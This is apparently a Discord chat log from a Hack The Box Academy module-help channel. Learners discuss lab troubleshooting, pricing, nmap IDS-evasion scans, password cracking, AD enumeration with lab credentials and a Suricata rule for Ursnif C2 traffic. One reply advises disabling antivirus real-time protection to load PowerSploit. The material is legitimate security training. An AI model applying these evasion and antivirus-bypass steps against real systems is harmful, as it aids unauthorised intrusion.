#modules
That file upload module was something else. I have no idea why my brain made it 100X harder than it was for just the skills assessment.
see i am replying to randoms my brain is done for the night!
I was having little to no luck with fuzzing on this for some reason. If you can test it locally it helps out tremendously to be able to tweak the errors. If you can wrap your head around that hint?
Which ACE entry can be leveraged to perform a targeted Kerberoasting attack?
active directory mode
Attacking Splunk module
splunk only operate over https?
not even with a redirect from http to https?
Good morning everyone, I want to get advice from you
I am now 18 years old, I am a first-year student at the university
I am studying information security and want to become a pentester, but because of the high threshold for entering pentesting, I want to choose another IT specialty (to find a job earlier) and come to pentesting from it, I am thinking which one is better (I am currently considering a python developer because I already have the basics)
Thank you all in advance ♥️
Help desk
get A+ (or at least the knowledge of A+) and you will probably be good to go
#careers-and-certs is a good room for that information. If you like to poll that room for the question.
CDSA module finding evil, Windows Event Logs Section, Q2. I use the exact query in answers but still don't get any results. it does not return any event (Also I can't copy and paste screen shots here? :o) this is my query
```
<QueryList>
<Query Id="0" Path="Security">
<Select Path="Security">
*[EventData[Data[@Name='ProcessName']='C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1790_none_7df2aec07ca10e81\TiWorker.exe']] and *[EventData[Data[@Name='ObjectName']='C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\wpfgfx_v0400.dll']]
</Select>
</Query>
</QueryList>
```
hello guys, i am facing issues while solving the live engagement section in the "shell and payloads" module. Everytime i connect the target machine via rdp i face network disconnect issues after every 1-2 minutes and also the ip of the machine not ping and after 2-3 machine again i can ping the machine and now rdp works but when connect via rdp it again disconnect after 1-2 minutes
here is the error:
```
┌─[us-academy-4]─[10.10.14.153]─[htb-ac-1202768@htb-jy72jrvllv]─[~]
└──╼ [★]$ xfreerdp /v:10.129.204.126 /u:htb-student /p:'HTB_@cademy_stdnt!' /workarea /smart-sizing /cert-ignore
[03:45:34:878] [9235:9236] [ERROR][com.winpr.timezone] - Unable to find a match for unix timezone: US/Central
[03:45:34:179] [9235:9236] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[03:45:34:179] [9235:9236] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[03:45:34:199] [9235:9236] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[03:45:34:199] [9235:9236] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[03:47:11:309] [9235:9236] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 110: Connection timed out
[03:47:11:309] [9235:9236] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[03:47:11:309] [9235:9236] [INFO][com.freerdp.client.common] - Network disconnect
```
any hint ?
Try using remmina
[Help] Has anyone able to find the flag of this module section, Linux Privileges Escalation of Environment enumeration. I was able to get the root user and found the flag.txt. The code doesn't work. https://academy.hackthebox.com/module/51/section/1592
try switching to TCP run this in your terminal...
```
sudo sed -i 's/udp/tcp/g; s/1337/443/g; s/tls-auth/tls-crypt/g' /etc/openvpn/*.conf; sudo systemctl restart openvpn
```
if you're using pwnbox ^ , if not, then set ovpn connection file to TCP
WriteProperty, I think
In Academy? Nothing! No more cubes to unlock any module 

damn, props for helping out
Going for the Win Boxes in the labs now!
im doing the SOC Analyst, and im having to force myself to get thru these IDS/IPS modules, i thought they'd be a bit more "fun" dunno
I kinda liked the defense modules
not to say they're not educational, and informative, just less fun than like the offensive stuff
HTB made them pretty enjoyable
i dont know how to count bytes or recognize them in stuff like the wireshark output to be able to create the offsets for the customs rules and stuff, im definitely gonna have to return to this stuff later when i can create a vm lab that will better help me familiarize myself with this stuff
its little things like that, that kill me
you know, identify an alert trigger, find its location in the packet, count its offset and size and create/modify the rule so it alerts if a packet matching its type/size/regex/etc is found
likewise.
What module is this from? Might give a check
just a sec its a section or two back i need to find it
ok there's two, its suricata rule development.
https://academy.hackthebox.com/module/226/section/2415 <-- Offset
https://academy.hackthebox.com/module/226/section/2451 <-- find the string that should be seen in the content keyword of a rule
Thought it was Yara
I’ll check it out in a bit
oh yara, is that "easier"? i think thats a few sections next in line
Module> Files transfers with code - I am unable to install python2.7 as instructed as it will not accept my password for HTB-Student? Any one having the same issues?
.
moin
Guys. Which graphical tool do you use to create an Active Directory map or a network maps?
I currently have a lab with several computers on the network and I need to make graphic notes for convenient penetration testing
Theres a tool that builds a database, i cant remember the name at the moment, let me check my notes, i think tis bloodhound?
or do you need something different? zenmap creates a simple network diagram as well
@pulsar oak ^
yes, bloodhound
yeah im not familiar enough with nmap to know if you can output that info with an nmap option
its interactive though so i dunno
Yes, I needed something like zenmap, but do you know if zenmap supports proxychains?
not sure i know nmap supports proxy chains so i dont think zenmap would be any different. i just checked the nmap downloads page and found a zenmap installer that says "all platforms" (whatever that means) its an RPM tho
and it says "...noarch.rpm", btw 🤓
I got it, I'll try, thanks a lot!
I guess you are supposed to fine tune that offset parameter in the rules file
And run it with that pcap file so you can see when it gets detected and when not
I'll go through some of the stuff in that pcap to check the filter you'll need to find it
Oh i got the solution, its just that its new to me... so doing that feels very odd i just need to get a vm lab up and just repetitively do stuff like that and play around and stuff, but i find it a little boring
ICS?
yeah now that im looking at another section here i realize what the problem is, i need to see the traffic for these types of attacks to be able to understand the rules, like see them from start to finish... make them even (playing both sides of the fence offense and defense) im not gonna fully understand this until i can do that
not sure what ICS is those are just screenshots from google for bloodhound and zenmap network map
Industrial Control Systems
Yeah. It helps in Wireshark
If you want to understand where that value comes from I found a good explanation to it. Can send you the stuff I just got
yeah i'd appreciate it im dealing with another exercise just like it
any tips on this?
analyzing the wireshark, but still unsure how to count bytes, offset, etc.
Hi guys , I am beginner can someone please explain how to get more cubes without subscription ?
Hi where can I report a finding with a question that i think is incorrect
You can also buy cubes. You don't need a subscription. But they are cheaper with a subscription.
Without buying cubes or subscription is there any strategy to use 50 cubes to max advantage... As I am not sure to purchasing cubes or subscription based on my inexperience to continue to learn or not...
hi all where to ask questions about module exercises?
You can use the cubes you received with your application to study the Tier 0 modules. The modules cost 10 cubes and give you 10 cubes back.
All modules from Tier I cost money
In AD Enumeration & Attacks > any section but I happen to be in "Privileged Access".
Does anyone have insight as to why a call to Get-ADUser works when RDP'd into the box, but not through Win-RM?
In Win-RM I get the error "Unable to contact the server. This may be because this server does not exist [...]"
You're in the right place. Be sure to mention the Module & Section by name so we know what you're asking about.
so we have a machine which we have ssh access and that machine(A) is connected to network(B)..So we want to access the other network(B) we can do that by using dynamic port forwarding using socks..In which we set up a socks server in machine(A) we have access to and from the attackbox we send nmap commands to machine(A) SOCKS server through ssh tunnel and from Socks server it executes the nmap's packets on the machine(A) and Discover the network(B) ..Is my understanding correct ?
Yes that is strategy I am applying.. I was 70 cube while sign in.. now I have 50 cubes by joining Linux and networking fundamentals.. after I want to learn bash script but it will take away full 50 cubes that is problem... Using tier 0 course is good strategy..
Is there any other strategy? Means is HTB cpts available on YouTube?
Yes, this sounds like a pretty accurate summary. To be very precise, you have access TO network B. FROM network B, however, you have limited access back to your attack machine -- only by way of replying via TCP.
Only modules up to Tier 0 may be shown on YouTube. No walkthroughs are permitted for anything above Tier 0.
If you want to learn CPTS, you need cubes
Did you try "import-module ActiveDirectory" on the winRM PS before the command
Yes for cpts annual subscription is only good option..
No, you can also buy cubes. You don't necessarily need a subscription.
If you are a student you can get a discount.
Means for cpts it is 1980 cubes , i have to spend 200$ that too with no certificate so bad option maybe if we want certificate otherwise just for knowledge it seems great... Am I right?
Best way is to get a subs since you get a discount
I am not student..
Cubes turns out more expensive at the end if you do the math
For 100$ it is 1000 cubes...
A subs is $60 something
for 1000 a month
So 🤷‍♂️
You guys are lucky. HTB is even unlocking a whole bunch of modules if you're getting annual. When I started only low level were applied to this
But that does not include the exam. With the silver sub you get exam voucher
Yes, the ActiveDirectory module is loaded. I'd get a "bad command or filename" type response if it weren't.
The error I get suggests I'm unable to connect to AD which is weird. There's not some additional things I need to do with winrm to get connected to AD is there?
Hm interesting. Can you enumerate with PowerView through winRM?
For 490$ you get whole year access plus certification...
I'll check that too. I googled it and got some hits so let me see where that takes me.
Good strategy if you don't want certification...
This
And you were commenting on the 1000 cubes for $100
Share the outcome please when you figure it out.
Woah wait, zenmap is cool.
I went with monthly cause it didn't have the higher modules when I started and this was available after I unlocked many of the modules
so it wasn't worth
I made the math at the time 
Thank you. I am not able to paste any screenshot here, idk why it doesn't work. CDSA module finding evil, Windows Event Logs Section, Q2. I use the exact query in answers but still don't get any results. it does not return any event (Also I can't copy and paste screen shots here? :o) this is my query
```
<QueryList>
<Query Id="0" Path="Security">
<Select Path="Security">
*[EventData[Data[@Name='ProcessName']='C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1790_none_7df2aec07ca10e81\TiWorker.exe']] and *[EventData[Data[@Name='ObjectName']='C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\wpfgfx_v0400.dll']]
</Select>
</Query>
</QueryList>
```
See #welcome and follow the instructions to be able to screenshot and interact with the full discord server.
I'll let someone else help you with the CDSA module with which I am unfamiliar.
yes
Maybe you are unlucky on that time but now in your point of view silver annual subscription also good...
Did you try cpts?
If you get or cleared cpts . You probably also clear oscp don't know oscp+... That is what heard in internet..
Yeah.... First I was thinking on going for the OSCP but they are pricey as heck.
Best I can tell it's the "double hop problem" which is discussed a little later, so this is speculation based on my limited knowledge but I think with RDP your credentials are [typically, by default] cached in LSA and with Win-RM they aren't. I can execute the command if I create a PSCredential object and pass that as part of the call:
```
# Build an explicit PSCredential so the WinRM session can authenticate to AD
$user = 'INLANEFREIGHT\htb-student'
$user_pw = 'Academy_student_AD!'
$user_sec_pw = ConvertTo-SecureString $user_pw -AsPlainText -Force
$user_cred = New-Object System.Management.Automation.PSCredential($user, $user_sec_pw)
$users="C:\tools\users.txt";
# Pass the credential on the call and write the account names to the file
Get-ADUser -Filter * -cred $user_cred|Select-Object -ExpandProperty SamAccountName > $users;
```
You may complete cpts here then 700 or 800$ for only examination for oscp.. very bad for middle income guys like me..
For OSCP you need the Course & Cert Exam Bundle from Offsec
Can't we just purchase exam?
For OSCP no
I don't think so, but ask Offsec
I wanted to do that as well 
Then it is too much for us.. it may cost more than 1500$, in India average yearly income is 2700$... unbelievable pricing...
Offsec is an American company that has to base its prices on the American market. Wages and living costs in America are significantly higher than in India.
Maybe after getting good job only it is possible..
Yes .. I got it.. They have to change their pricing depends on some demographic also .. Indian learning population earn them good business... But there maybe many loopholes..
That is why cpts best .. 500$ is not that much consider to 1500$... Just that cpts need more recognition.. atleast one competition needed to oscp...
Can someone give me a quick answer to which module is hardest between:
- Advanced Deserialization Attacks
- Modern Web Exploitation Techniques
- Advanced XSS and CSRF Exploitation
- Introduction to Binary Fuzzing
The costs for the servers, employees, etc. are always the same. No matter where the student comes from.
That probably depends on your previous knowledge
Have you done those? I mean.... I want a personal opinion
What did YOU specifically find to be the hardest I mean
i have a problem in the module Windows Attacks & Defense
Credentials in Object Properties. Can anyone help me and explain why the server DC1 doesnt create the correct logs ? I did all the steps correct but couldnt take the answer for the last question cause the server seems to not work properly
Only the web modules. But as I said, it depends on your prior knowledge.
For me, Advanced Deserialization Attacks was the most difficult of the three web modules mentioned
But it's because I don't know C# very well.
Have to plan which modules to unlock next when the subscription hit. Those are on the list
I can speak for the Advanced XSS and CSRF Exploitation, it was challenging and heavy but a lot of fun.
hey guys quick question im doing the password cracking module and im doing the hard lab, i found this file also in the medium lab any idea what it is? there are a bunch of passwords in it its like a list Users\johanna\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt
its for cracking
use it with hashcat for example
for which reason is it on a target?
its not a target , etc. you can use these wordlist-passwords.txt for cracking another files with hashes
i dont really understand? The passwords are in clear also btw
Thanks, @acoustic owl and @old oasis
Guess I'll go for something like that next
If you searching about any hacking tools I can bring it up for you
hello everyone pls help
windows prv escalation : other files
Using the techniques shown in this section, find the cleartext password for the bob_adm user on the target system.
I used all methods but not worked
thats the point its clear in order to crack
guys
Hey guys
Im trying to do this right now
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
I have decoded it then I made chatgpt write a python script that will take the cookie and append the alphanum-case.txt file one by one to the end
Then I took that text file and put it into intruder in the cookie field
But none of the pages returned in intruder are a successful login
Ive been stuck on this for an hour
you don't need to have a python script after all burpsuite offers a brute force option itself
wth, i was having trouble with a lab so terminated and respawned it and got a totally wrong lab 🤣
Can anyone please give me any free course name like HTM and THM free videos on Junior Penetration whether on YouTube or any other ... Has to be interactive like THM and HTM...
Here you can find videos from IppSec, which he has recorded on various machines
https://ippsec.rocks/
Just search for the topic you are interested in
Search utility for IppSec's YouTube videos
Thanks a lot buddy...👍
In the modules where it says how long it takes to finish (for example, 8 hours), does that mean you have to be working for 8 hours straight, or can you work over a span of 8 hours to complete it? Also, for the modules that say "2 days," how long would you need to work each of the 2 days to finish?
No. It’s a guesstimate. Some can be finished sooner and some later. It all depends on the person doing it
It's an estimation
ok i understand now thanks for the answer
GUYS i need help i can not delete my htb account
Reach out to support
Need to speak to a person? Learn how to reach our support via HTB Labs.
i need to open ticket?
yes
green bubble or email
ı dont understand
Take a look at the link above
same here..i am also not getting access to ticket area.. mine is 2 days account..
why your delete account text is seem grey right?
probably wrong guy reply.. i didn't delete account...
is it a good idea for using something like ubuntu instead of a virtual machine?
There is little confusion here... Is there HTB ticket just like THM
depends on your experience level with Ubuntu. if you're new to it you're probably going to have a rough time compiling all the tools etc. easiest is to just run a kali vm or use the pwnbox.
I saw Tickets in THM not in HTB....
thank you
The link I posted above explains how you can contact support.
Ok I got it, I got confuse with his complaint ticket with THM Tickets... IT is nothing to do with what I thought...
No, THM has nothing to do with HTB
Yes.. I was just going through or studying in both websites.. so got confuse... there is one section of Tickets in THM, I thought HTB also have it.. so that is why I asked where is HTB Ticket... My mistake..
hello guys, help me.
how can I change chrome browser cookies using third-party desktop apps.
maybe API hooking? DLL?
Which module are you working on?
SPOILER ALERT I DONT WANNA SPOIL BUT NEED A LIL HELP
hey i am working on NMAP IDS/IPS evasion - Medium Lab and after running my scans i am getting version to be ||NLnet Labs NSD|| but it is not working because i feel like it aint the version or like the full version name, can anyone please lmk if this is correct or not ???|| i found it from udp scan port 53 running version NSE script i also used my source port as 53 too||
You're on the right path. You'll learn that if one way isn't working try another.
plenty of people have completed the module
umm alright i will try something around that then
just ask your question and people can help
Just to be sure, because I don't remember what the service is called (e.g. NLnet), do you want to confirm the port number for a sanity check? You can mask it here with spoiler tags or DM.
||53/udp||
Hum... ok, give me a minute. I was looking at my notes for "hard" and don't have anything down for medium.
oh alr
Oh yeah.. ok I think you're good. you're looking for a DNS server so, yeah, ||tcp/udp 53||.
yup but i am not able to catch the version for it
||sudo nmap -sU 10.129.102.200 -p 53 --reason -D RND:10 -Pn -n --stats-every=10s --script=version -sV --source-port 53 ||
this was my scan
I'm firing up the lab to see if I can remind myself how it's done, but same advice applies: if one way doesn't work try other ways. The version will be in flag form, e.g. HTB {...}
ohhh alrr thankyou i will keep looking
Ok, there are at least a couple ways to get the flag. There's a lot of unnecessary crap in your command, but it does return the flag for me. If it's not working for you, make sure the ports you expect to be open are actually open with a simpler scan. Ping should work too. Sometimes the labs get goofed up and you have to terminate/restart.
wait it IS returning flag for you ?
yuppers
guess i should do it in the pwn instance instead of my machine
give it a try. It'll work from your system too if assuming you're vpn'd in
i want to download the .ovpn file but the exercise doesn't have the link .
@shut vapor that was super quick doing it in the pwn
idk man why these issues pop up even when i AM using the vpn
Good you got it working. It seems to steady out after you get used to the workflow. If things seem like they're not working for me I typically do a few tricks:
- Terminate / Restart the lab
- Terminate / Restart and redownload the .ovpn file
- Switch regions then terminate / restart and redownload the .ovpn
oh no i'm sorry i haven't done that module yet
Sorry, I haven't completed that module either.
yea i did that too but nvm the pwn works so gg
uk what i found the issue
why it didn't work
oh?
it was because i was connected to the tcp vpn and now that i switch to udp it worked like a charm
I'll have to keep that in mind to recommend. I've heard from a few people the TCP version works a little better now that I think of it.
no but when scanning for the udp ports tcp didnt work for me
i even re routed it with new file but no luck there
TCP works better for RDP
stable connection
use the script they provide
i am
thats the same exact script they provide yet i get no response
try replacing wget -q with curl -O
someone???
download it from htb labs
i cannot use the pwnbox then i want to get the vpn file
Scroll up, the link to download .ovpn is above where you click to spawn a lab.
academy
there are no link
Hey is the correct room to ask a question regarding one labs in the modules?
¯_(ツ)_/¯ If it's not there... you've turned off script blockers? Refresh the page? I don't know, you'd have to talk to support.
Yes. Be sure to mention the module & section by name so we know where you're asking. Also see #welcome and follow the instructions to link your account. Then you can share screenshots and see the rest of the server.
hey @shut vapor could you help me w something real quick? i just wanna know which one of these are absolute useless and served no purpose whatsoever , i feel like those are
- -Pn cause the host is up and not blocking anything
- -D because this port is accessible and i dont need to mask around too much
Run the command 10 times and remove portions of it until you figure it out.
seriously this section doesn't appear. Is it possible to download it from the other module?
fair enough, " F around and Lean " - someone idr
But your interpretation of -Pn is inaccurate. This tells nmap not to ping the host first, just assume it's up.
oh yea thats that my bad
thankyou alot for the help today i appreciate it man
Alright cool, identified. Im doing Password Attacks Lab - Medium. I was able to get the zip archive I need to crack, and converted it to a crackable hash with zip2john, and was able to run it against john to try and crack it. I tried the provided password list from resources, I tried the mutated list, and I tried rockyou and a bunch of other wordlists. I tried hashcat as well just wondering if it was a problem with john, but also to no avail. I ran incremental mode in john for the heck of it for a few hours, and nothing there. Am i missing something?
Are you sure you tried all 3 lists with hashcat? That path worked for me.
^
You shouldn't have to set RPORT to 80/443 if the web server is on 8080. Is there a separate port specification for VHOSTS? like VHOST_RPORT? I forget. If you share a screenshot of the options it might jog a memory.
im pretty sure but ill retry lol. Is there any reason why john would treat the lists differently than hashcat that you're aware of?
As far as I'm aware john would work just fine.
I've just got hashcat cooking on my GPU so it's my goto.
Well that makes more sense to me & sounds familiar. Set RPORT to 8080 and you have to set the VHOST too. Is there still some confusion?
SNI is pretty cool. Let me tell you about the bad old days... 👴
yeah hashcat was able to work, for some reason john wasn't able to crack it with the same lists and it was correctly going through the wordlists. I reinstalled it and still had the same problem. For hashcat I forgot to remove the stuff up to $pkzip$ so i was using the wrong mode... live and learn lol
Good news. And, yeah, do a lot of experimentation with that module to play with as many tools as possible. You'll find a preference for one over the other depending on circumstances. Though, more for password attack tools (e.g. netexec vs medusa vs hydra vs etc..) than hashcat and john.
Module: Information Gathering - Web Edition
Section: Web Archives
Due to the cyberattack on the Wayback Machine on October 9th, is there any way to complete this section moving forward? I answered the first 3 questions before the attack but did not complete the last 3 questions.
Hi, anyone here who has completed the new wifi penetration testing module? I'm Stuck at the live engagement.
I don't believe you can at this time. I'm in the same boat.
I just moved on for the time being
What exactly is not working?
i dont know if this is the right channel to ask but i cant access to the cheat sheet or even use hints accidentally i closed the machine before doing this question " Start your workstation, then use the integrated terminal to find the Linux OS flavor by running the following command: cat /etc/issue "
its my first time to use the website soo
I'm unable to capture the handshake in order to answer question 2. I deauthenticated the Client from the Wifi Network and started airodump-ng again. But the Handshake is missing..
well this aint helping
payloadbunny, if you're still there would you mind if I dm'd you real quick before submitting something to erratum?
Take another look at the module.
During the deauth you have to keep the scan running.
sure, send me a dm
I see, thanks I'm going to try that.
i believe only their pre-approved list and if you're not in that you need to reach out to support
i could be wrong on that but i think i remember reading something like that
Thank you so much it worked!
i cant buy any module with cubes i am clicking the button and nothing happening
just the screen little shaking
disable all adblockers and try again
is there any problem going on with module Attacking Domain Trusts (Linux)? I changed twice vpn servers, changed pwnbox twice, same with the target. No matter what I change "@ea-attack01" keeps crashing/freezing and I lost conn with it.
well i am using brave it have attaches adblocker soo
should i try with another browser?
Module: Vulnerability Assessment
Section: Nessus Skill Assessment
My Nessus instance is unreachable, i dont get any response from spawned server. Could anyone check if yours work good.
Spawn target: https://spawnedip:nessusport
it worked
You need to specify https
yhyh it seems it doesn't work at all i specified port and used https but unreachable, i will try to change vpn region
Do you wanna hear my suggestion
Anyone here who has a tip on connecting to the wifi network? The network is hidden so i think i have to use the terminal. I already created a wpa.conf file which contains the ssid and password. However I'm unable to connect using wpa_supplicant.
We're going insane cuh yk i'm sayin
Rat
get out of here nerd
You get out fake profile catfisher
I'm staying right here!!!
ok noodle arms
Please stop spamming, my question is moving out of the screen 😭
No one cares bro
People won't answer, get that
This world is full of bad people and they don't care
Nah, the HTB Community is pretty chill
No bro every community is manipulative and calculated
Feel free to DM
the security logic is undeniable, you cant hack stuff if you can't even login 
I don't, but that's the point, because both are not working, I am very sure the ACADEMY-EA-ATTACK01 is having some crazy stuff running there, because I can connect using pwnbox, I just can't keep connected
If it is an issue with it, then reach out to support
Tech issues on htb end can't be solved on discord
Run everything just like in the module
If you have a question shoot it
I have a question I am beginning hacking and I don’t know what to work on first
I joined hack the box
I know nothing about computers where should I start
Obviously I can do basic stuff like play games and watch YouTube but nothing beyond surface level except write a few lines of python
Thank you bro
Im on the public exploits module and im just a bit stumped as to where im supposed to go. i used nmap to get the ports and versions running, then searchsploit on 2 of the ports that returned versions, one had no results but the other one had quite a lot. but now what?
||since im trying to get a flag im guessing i want an exploit that gives me RCE which there was two of to try:
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py||
I'm on introduction to windows command line and I got stuck on import modules to powershell for some reason I can't seem to import powersploit since it being flagged as malicious. Is there a work around I can use to navigate this problem.
is this the getting started module?
yes
did you set the execution policy?
try unrestricted
why do u need nmap, did you open the ip on your browser
I did try unrestricted but it still didn't work.
why are you using psd1
Hey guys anyone can help? Im on the password cracking module on the hard lab, i found the bitlocker password to mount the file i found, i tried to mount it on the target (windows) but need admin password that i dont have for the moment, im trying to mount it on linux but i encounter some problems can anyone help in dm?
where did you get powersploit (the link)? you could try disabling real time protection
Thank you ... it did run after disabling real time protection.
ohhh ok, i had opened it but it hadnt really registered xd i did find an exploit but just need to figure out the username/pw
which im guessing i shouldnt need to just brute force common username pw
you dont need any credentials
what should i be searching for then? ||search backup plugin 2.7.10|| only returns one result and thats the exploit im trying to run but get a failed to login to wordpress
try google
ok so i finally got it still feel kinda dumb cause while i was almost there the thought of ||setting the filepath to /flag.txt|| never crossed my mind
Hi, everyone, how are you? I hope so.
I would like to know if anyone has completed the "Active Directory LDAP" module. I'm stuck on an exercise and would really like some help.
Credentialed LDAP Enumeration
What user account has their userAccountControl value set to ENCRYPTED_TEXT_PWD_ALLOWED (store passwords using reversible encryption)?
To complete this exercise, I need to use the credentials provided by the exercise. However, when I use them, a credential error is displayed, but I'm not wrong. I use ldapsearch-ad.py, but the response is not returned. So, I try using windapsearch.py, and the error is displayed. How come the credentials work in one tool and not in another? All that's left is this exercise to complete the module 100%.
To the Administrators of the Modules,
I have recently completed the “Windows Attacks & Defence” module and would like to share my observations. This module presented more technical difficulties than any other I have tried so far. There were more technical issues unrelated to the subject matter than expected, to the point where it diminished the motivation and interest in completing the content. I kindly request that you address these issues, particularly with regard to the remote sessions, as well as other malfunctions that were observed.
P.S. On several occasions when I found the solution, I had to apply techniques that were not taught in the module in order to arrive at the answer.
need help w burpsuite module pleaseeee
its requiring me to intercept the source code so i can change the type and length values
but idk how to intercept it , i only get the GET request info
the content-type is a header
in burp it's a checkbox u can select which should automatically adjust for the length
is there anyone here that works for Hackthebox
I have some Question about the Silver Annual Subscription
the Academy version
Did u go into ur settings and check off intercept response
check that off and then press the intercept box in the intercept tab and then make the request again in ur browser
Hi all, I had an issue with the Blind SQL Injection module, for Time-based Oracle Design, it wants the 5th letter of the db_name(), I have found it and the time-based response time confirms it but the answer is not being accepted?.
Don't believe I can upload screenshots in this channel, but I have an ss of the query resulting in a delay for the correct character and no delay when using !='{char}'
figured it out thanks
i didn’t fully refresh the page
try to find people from the CWEE channel cause not a lot of people are doing those modules here
Idk my script gave me the right answer right way but a friend of mine had the same problem
This what he sent me "it was an oracle problem - I needed to change the delay.."
Perhaps something alike
It seems its because I was doing the SQLi in the GET param and not the user agent
need to make the module script work now though
how do I contact support about a module lab
Bottom right hand corner there should be a button and it'll guide you through contacting
I'm stuck in the very last flag of login brute forcing skill assessment can't find the password, can someone help? Already try brute forcing with .txt is inside de ssh and didn't help, also tried with some passwords from seclists and didn't help neither,
Also, is the step by step worth it? Like it could help me in cases like this ?
If you have annual subscription then you can use if you dont it doesnt let you use it but if your stuck then id recommend checking if it helps
And if you dont have annual subscription you can check writeups done by ppl or videos
I'm new to htb, and am currently doing some basic stuff, going through the different OS. However I'm stuck at the very last question of the Windows module, https://academy.hackthebox.com/module/49/section/1015
All other questions are ok, but the last one I just get wrong answer.
Shouldn't it be enough to just do a New-LocalGroup -Name "HR"
then get the SID by doing Get-LocalGroup -Name "HR" | Select-Object Name, SID
What am I doing wrong?
Nevermind, I finally got it right...by calculating the sid backwards. So the correct sid in the VM was the wrong answer, seems like it is a static sid and you must create everything in the correct order and not deleting anything.
yeah you'll need to do it in the target provided, non default users/groups starts allocation from 1000
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-azod/ecc7dfba-77e1-4e03-ab99-114b349c7164
Frustrating, but great to finally get it right. Now lets go on with some more fun stuff with nmap.
For login brute forcing skill assessment part 1, are we simply brute forcing using the entire username and password list given to us? No information is given regarding usernames, password requirements, an individual's or company's name, etc.
Hey I've a question on the module : Windows Server Update Services (WSUS) in Windows Lateral Movement section, I did the same things than the solution but it didn't work, someone has an issue with that module ?
Yes, just brute force with the info given
I do not have annual subscription but I want to know if the step by step feature can help me before buying it
I might be here a while then 😅 It's been an hour so far with no matches
Internet Archive seems to be back online (https://web.archive.org/)
GM guys
need some clarification on Knowledge Check machine box
I have got root but I would like to ask something without spoiling it here
anyone to hit me on DMs?
no scammers please lol
ask in #boxes
thanks @next bronze
Hey i am doing penetration tester path. Can i skip modules i find hard and come back to it later? Or i have to do it in order?
hello, i'm a noob and i have a question
a friend had a suitcase stolen, inside there wasn't much of value unfortunately, but there was among other things an old samsung B2100 phone (very old therefore) as well as a tablet with Lineage OS, and apparently no possibility of locating the device through the google account; but the tablet is connected to his discord account.
Is it possible to locate one of the devices, and therefore the case, using this method alone?
whats that got to do with the academy modules?
I didnt arrive to text the general channel 😅😅
Bruh I can't ping the machine even though i am connected to the vpn
This channel is specific to HTB academy modules, what youre asking is unrelated
is the machine from the academy or labs?
from what I know when you make a new vpn file it will make the previous one redundant so make sure you use the latest one
cant ping it on vm instance either
we cant help you on this
Some build upon each other but you can skip around. The early stuff is pretty fundamental. Nmap, e.g.
is it possible to reset progress in a module so i can do the assessment tasks again from scratch?
no
sad
that shouldn't stop you from doing the assessment anyway
just don't look at the answer
also the answer is not that important its more the steps you took to reach it
yeah, lol. But still i missed the feel of getting the answer right after submitting it in the task.
do you have problem on your side to ping machines ?
And also it is hard to read only the task questions without looking at the answers mistakenly.
try nc -vz 83.136.254 158 47683
but if it is a docker and it hosts a website then you are missing the path ...
you can't just "connect" to it with curl if such is the case
I'm just trying to do this https://academy.hackthebox.com/module/23/section/253
Hi I'm stuck at the Password Attacks Module on network services. I've found every credentials except for rdp. I know that the method is the same you just have to change the service name in hydra. There is a reddit post where someone also says that the rdp brute forcing did not work for him. Is it working for you guys? Do you have any alternatives?
use the resources given to you in the module
I did that
You can DM me
https://academy.hackthebox.com/module/87/section/883
following this guide rn i followed it and updated all that stuff but when i type cat tools.list like it says instead of printing all tools i have it prints "No such directory"
mind you following the guide and updating it took around a good hour or so to complete so...
Make sure you have the right spelling
Could be tools.lists maybe?
Or capital letters
huh it works now same spelling as before... weird... but thank you!
I want htb to make a module "How to get a job in cybersec and get paid for it"
Archive is back online and I was able to complete this section in case you hadn't already seen.
Did you end up getting this, I can help
just had to be patient
Did you automate the VRFY process?
yes I did
Nice, could you send me the script? I did it manually 😭
ofc
Thanks bro
Im having trouble counting packet bytes in the IDS/IPS modules, of the SOC Analyst Path
(particularly the walk thru with Ursnif https://academy.hackthebox.com/module/226/section/2416)
Can someone help me better understand why when i count 12 bytes like the rule suggests i dont end up at the /images content?
Rule:
alert tcp any any -> any any (msg:"Possible Ursnif C2 Activity"; flow:established,to_server; content:"/images/", depth 12; content:"_2F"; content:"_2B"; content:"User-Agent|3a 20|Mozilla/4.0 (compatible|3b| MSIE 8.0|3b| Windows NT"; content:!"Accept"; content:!"Cookie|3a|"; content:!"Referer|3a|"; sid:1000002; rev:1;)
if i start in the highlighted section, sure images is within the first 12 bytes, but the rule says the first 12 bytes of the packet (payload?) which is not the same, as i understand it?
Manual upload of war file on tomcat works perfectly but got problem running the automated exploit any ideas ?
Should work given that it is an "exercise for the reader" as the module says
try changing the payload type a few times
show payload, then you can pick what makes sense
u sure?
could be payloads
no such command in the help section, maybe u mean handler?
try a few, both staged and stageless, I had this issue with metasploit exploit in the past and switching the payload and/or targets around a bit makes it work
you are ending up at /images content. both pictures are same.
for detection, if it is in 12 bytes of packet payload. it is detected. could you rephrase your question here?
Yeah, thats highlighted, but the packet starts at 00, the highlighted portion starts at 003B if i have my hex counting correct
the "11th" byte in the 0030 row
which is greater than 12
im trying to filter in wireshark at the moment to see if it squares with the snort rule, the other content triggers may be causing me some confusion in squaring each rule with its trigger
that's a good understanding, i did not use wireshark for checking. i understand you now. lemme check
yeah its odd im pretty far out of my comfort zone with this i dont even know how to count in hex good
or like how to properly specify locations in hex, thus my statement: "11th byte of the 0030 range"
